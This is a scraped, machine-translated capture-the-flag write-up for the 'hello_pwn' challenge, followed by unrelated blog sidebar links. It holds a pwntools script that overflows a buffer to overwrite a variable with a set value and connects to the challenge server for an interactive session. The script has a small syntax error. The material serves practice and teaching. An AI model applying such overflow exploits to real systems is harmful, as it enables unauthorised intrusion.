当前位置:网站首页>Beginner level of attack and defense World Hello_ pwn
Beginner level of attack and defense World Hello_ pwn
2022-06-28 12:27:00 【Day-3】

First , Let's look at the documents first . Then look at its protection .
There is no protection . Run it :
Put in IDA View in ,
Need us to unk_601068 Fill data on , And then dword_60106C The content in the address is overwritten with 1853186401.
To write Python Code :
from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 1
def main()
if content == 1:
day3 = process("hello_pwn")
else:
day3 =remote("111.200.241.244",49744)
payload = b'a' * (0x6c - 0x68) + p64(1853186401)
day3.recvuntil("lets get helloworld for bof\n")
day3.sendline(payload)
day3.interactive()
main()
process and remote Connect to local programs , That is, it is often said to play local and remote .
Add b Set as bitstream , Means to transmit data ,p64 pack , Package the data into a byte stream .
obtain Flag.
边栏推荐
猜你喜欢

ASP.NET CORE Study03

Redis principle - List
![[unity Editor Extension practice] dynamically generate UI code using TXT template](/img/20/1042829c3880039c528c63d0aa472d.png)
[unity Editor Extension practice] dynamically generate UI code using TXT template

Deep learning has a new pit! The University of Sydney proposed a new cross modal task, using text to guide image matting

Ugui uses tips (VI) unity to realize vertical line display of string

group_concat学习与配置

UGUI强制刷新Layout(布局)组件

如何在Microsoft Exchange 2010中安装SSL证书

KDD 2022 | graph neural network generalization framework under the paradigm of "pre training, prompting and fine tuning"

What is the difference between internal oscillator, passive crystal oscillator and active crystal oscillator?
随机推荐
我的NVIDIA开发者之旅-Jetson Nano 2gb教你怎么训练模型(完整的模型训练套路)
【Unity编辑器扩展实践】、通过代码查找所有预制
吐血推荐17个提升开发效率的“轮子”
【C语言】如何很好的实现复数类型
.NET混合开发解决方案24 WebView2对比CefSharp的超强优势
【JS】斐波那契数列实现(递归与循环)
什么是数据合规?怎样做到数据合规?
[source code + code comments] error state Kalman filter, extended Kalman filter, gps+imu fusion, EKF eskf gps+imu
Unity Editor Extension Foundation, GUI
【Unity编辑器扩展基础】、GUILayout
Custom title bar view
【C语言】判断三角形
开源项目维权成功案例: spug 开源运维平台成功维权
Source code analysis of ArrayList
Many benefits of SEO optimization are directly related to traffic
模板_大整数乘法
Three ways to implement LRU cache (recommended Collection)
杰理之wif 干扰蓝牙【篇】
EMC RS485 interface EMC circuit design scheme
[C language] use of nested secondary pointer of structure